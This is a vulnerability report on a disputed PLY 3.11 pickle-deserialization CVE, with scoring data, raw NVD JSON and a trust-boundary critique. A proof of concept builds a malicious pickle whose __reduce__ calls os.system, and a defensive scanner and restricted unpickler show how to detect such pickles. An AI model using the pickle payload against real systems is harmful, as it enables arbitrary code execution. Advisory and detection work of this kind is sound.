Security Vulnerability Report
CVE-2025-56005 CVSS 9.8 CRITICAL

Published: 2026-01-20 19:15:49
Last Modified: 2026-02-06 20:16:08

Description

An undocumented and unsafe feature in the PLY (Python Lex-Yacc) library 3.11 allows Remote Code Execution (RCE) via the `picklefile` parameter in the `yacc()` function. This parameter accepts a `.pkl` file that is deserialized with `pickle.load()` without validation. Because `pickle` allows execution of embedded code via `__reduce__()`, an attacker can achieve code execution by passing a malicious pickle file. The parameter is not mentioned in official documentation or the GitHub repository, yet it is active in the PyPI version. This introduces a stealthy backdoor and persistence risk. NOTE: A third-party states that this vulnerability should be rejected because the proof of concept does not demonstrate arbitrary code execution and fails to complete successfully.

Record status: NVD tags this CVE as disputed (see `cveTags` in the raw JSON below). Weakness: CWE-502 (Deserialization of Untrusted Data).

Note on the trust boundary: in PLY 3.11 `picklefile` is an alternative to the default `tabmodule` cache (`parsetab.py`), which `yacc()` imports as ordinary Python. The application, not a remote party, chooses which file `yacc()` opens, so an attacker must already be able to write the cache that the application later loads; with the default cache that write is also code execution. The CVSS vector below (AV:N, PR:N) does not reflect that precondition.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dabeaz:ply:3.11:*:*:*:*:*:*:* - VULNERABLE
PLY 3.11 (the CPE matches version 3.11 exactly; no earlier or fixed version is listed)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import os
import pickle


class RCE:
    # pickle stores the callable and arguments returned by __reduce__();
    # pickle.load() then calls os.system(cmd) while rebuilding the object.
    def __reduce__(self):
        cmd = 'whoami'  # replace with the actual command
        return (os.system, (cmd,))


# Generate the malicious pickle file
with open('malicious.pkl', 'wb') as f:
    pickle.dump(RCE(), f)

# Exploit attempt. The original PoC called the module object, yacc(...),
# which is a TypeError; the function is ply.yacc.yacc(). Even so, yacc()
# first reflects a grammar (tokens, p_* rules) from the calling module and
# raises YaccError('Unable to build parser') before it opens picklefile, so
# this standalone script stops there. That is the basis of the rejection
# noted in the description.
from ply import yacc

parser = yacc.yacc(picklefile='malicious.pkl')
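The following is an added example, not part of the CVE record, the PoC repositories or PLY itself. It shows what a practitioner can do with a pickle-based parser table before trusting it: a static scan with `pickletools` that lists every `(module, name)` the stream would import without constructing any object (covering both the `GLOBAL` opcode used by protocols 0 to 3 and the `STACK_GLOBAL` opcode used by protocol 4 and later, so it goes beyond the single protocol the PoC relies on), and a restricted `Unpickler` whose `find_class()` refuses every global, which is sufficient for PLY-style tables that contain only strings, integers, dicts, lists and tuples. The "benign table" layout (version string, method, then tables, written as consecutive pickles in one file) is a constructed stand-in for a PLY picklefile, not a real `parsetab`. One assumption worth knowing: the module recorded for `os.system` is platform-dependent (`posix` on Linux, `nt` on Windows), which is why the scan reports the module rather than assuming `os`.

```python
import io
import os
import pickle
import pickletools

# Opcodes that import or call something when the stream is loaded.
_CODE_OPCODES = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "NEWOBJ",
                 "NEWOBJ_EX", "REDUCE", "BUILD"}
# Opcodes that push a string; STACK_GLOBAL takes module and name from the
# two most recent ones.
_STRING_OPCODES = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE",
                   "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


class ShellPayload:
    """Same shape as the PoC: __reduce__ hands pickle a callable plus args."""

    def __reduce__(self):
        return (os.system, ("echo pwned",))


def build_payload_bytes(protocol: int = 2) -> bytes:
    """Constructed malicious stream; never passed to plain pickle.loads() here."""
    return pickle.dumps(ShellPayload(), protocol=protocol)


def build_benign_table_bytes() -> bytes:
    """Constructed stand-in for a PLY picklefile: several pickles in one file."""
    buf = io.BytesIO()
    for obj in ("3.10", "LALR", {"S": 0, "expr": 1}, [("S", 1), ("expr", 2)]):
        pickle.dump(obj, buf, protocol=2)
    return buf.getvalue()


def _opcodes(data: bytes):
    """Yield (opcode, arg) across every pickle in a multi-object stream."""
    buf = io.BytesIO(data)
    while buf.tell() < len(data):          # genops stops at each STOP opcode
        for opcode, arg, _pos in pickletools.genops(buf):
            yield opcode, arg


def referenced_globals(data: bytes) -> set:
    """Every (module, name) the stream would import, found without loading it."""
    found = set()
    recent_strings = []
    for opcode, arg in _opcodes(data):
        if opcode.name in ("GLOBAL", "INST"):
            # pickletools renders the pair as one "module name" string
            module, name = arg.split(" ", 1)
            found.add((module, name))
        elif opcode.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            found.add((recent_strings[-2], recent_strings[-1]))
        elif opcode.name in _STRING_OPCODES:
            recent_strings.append(arg)
    return found


def has_executable_opcodes(data: bytes) -> bool:
    """True if loading the stream would import or call anything at all."""
    return any(opcode.name in _CODE_OPCODES for opcode, _arg in _opcodes(data))


class NoGlobalsUnpickler(pickle.Unpickler):
    """Refuses every global lookup, so REDUCE can never obtain a callable."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            f"refusing to import {module}.{name} from a parser table")


def safe_load_all(data: bytes) -> list:
    """Load a multi-object stream the way PLY consumes its picklefile, globals disabled."""
    buf = io.BytesIO(data)
    objects = []
    while buf.tell() < len(data):
        objects.append(NoGlobalsUnpickler(buf).load())
    return objects


def load_is_rejected(data: bytes) -> bool:
    """True if the restricted loader refuses the stream (no payload ran)."""
    try:
        safe_load_all(data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    for label, data in (("payload", build_payload_bytes()),
                        ("payload-proto4", build_payload_bytes(protocol=4)),
                        ("benign", build_benign_table_bytes())):
        print(label, "globals:", sorted(referenced_globals(data)),
              "executable:", has_executable_opcodes(data),
              "rejected:", load_is_rejected(data))
```

The static scan is the check to run on a cache file whose provenance is unclear; the restricted unpickler is the change to make in code that has to keep loading such files. Neither is a fix inside PLY, and the trust-boundary note in the description applies to both: an attacker who can write the cache file can usually also write the `parsetab.py` that `yacc()` imports by default.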

References

https://github.com/bohmiiidd/Undocumented-RCE-in-PLY (Exploit, Third Party Advisory)
https://github.com/bohmiiidd/Undocumument_RCE_PLY-yacc-CVE-2025-56005 (Exploit, Third Party Advisory)
https://github.com/tom025/ply_exploit_rejection (Exploit, Mitigation, Third Party Advisory)
https://github.com/tom025/ply_exploit_rejection/issues/1
http://www.openwall.com/lists/oss-security/2026/01/23/4 (Exploit, Mailing List)
http://www.openwall.com/lists/oss-security/2026/01/23/5 (Mailing List)
http://www.openwall.com/lists/oss-security/2026/01/28/5 (Exploit, Mailing List)
http://www.openwall.com/lists/oss-security/2026/01/29/1 (Exploit, Mailing List)
http://www.openwall.com/lists/oss-security/2026/01/29/2 (Mailing List)
http://www.openwall.com/lists/oss-security/2026/01/30/1

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56005", "sourceIdentifier": "[email protected]", "published": "2026-01-20T19:15:49.247", "lastModified": "2026-02-06T20:16:08.237", "vulnStatus": "Modified", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "An undocumented and unsafe feature in the PLY (Python Lex-Yacc) library 3.11 allows Remote Code Execution (RCE) via the `picklefile` parameter in the `yacc()` function. This parameter accepts a `.pkl` file that is deserialized with `pickle.load()` without validation. Because `pickle` allows execution of embedded code via `__reduce__()`, an attacker can achieve code execution by passing a malicious pickle file. The parameter is not mentioned in official documentation or the GitHub repository, yet it is active in the PyPI version. This introduces a stealthy backdoor and persistence risk. NOTE: A third-party states that this vulnerability should be rejected because the proof of concept does not demonstrate arbitrary code execution and fails to complete successfully."}, {"lang": "es", "value": "Una característica indocumentada e insegura en la librería PLY (Python Lex-Yacc) 3.11 permite la ejecución remota de código (RCE) a través del parámetro 'picklefile' en la función 'yacc()'. Este parámetro acepta un archivo .pkl que se deserializa con 'pickle.load()' sin validación. Debido a que 'pickle' permite la ejecución de código incrustado a través de '__reduce__()', un atacante puede lograr la ejecución de código pasando un archivo pickle malicioso. El parámetro no se menciona en la documentación oficial ni en el repositorio de GitHub, sin embargo, está activo en la versión de PyPI. Esto introduce una puerta trasera sigilosa y un riesgo de persistencia. 
NOTA: Un tercero afirma que esta vulnerabilidad debería ser rechazada porque la prueba de concepto no demuestra la ejecución de código arbitrario y no se completa con éxito."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dabeaz:ply:3.11:*:*:*:*:*:*:*", "matchCriteriaId": "278FED9B-7970-410E-B5F5-C87B229441CC"}]}]}], "references": [{"url": "https://github.com/bohmiiidd/Undocumented-RCE-in-PLY", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/bohmiiidd/Undocumument_RCE_PLY-yacc-CVE-2025-56005", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/tom025/ply_exploit_rejection", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://github.com/tom025/ply_exploit_rejection/issues/1", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/23/4", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Exploit", "Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/23/5", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/28/5", "source": 
"af854a3a-2127-422b-91ae-364da2661108", "tags": ["Exploit", "Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/29/1", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Exploit", "Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/29/2", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/30/1", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}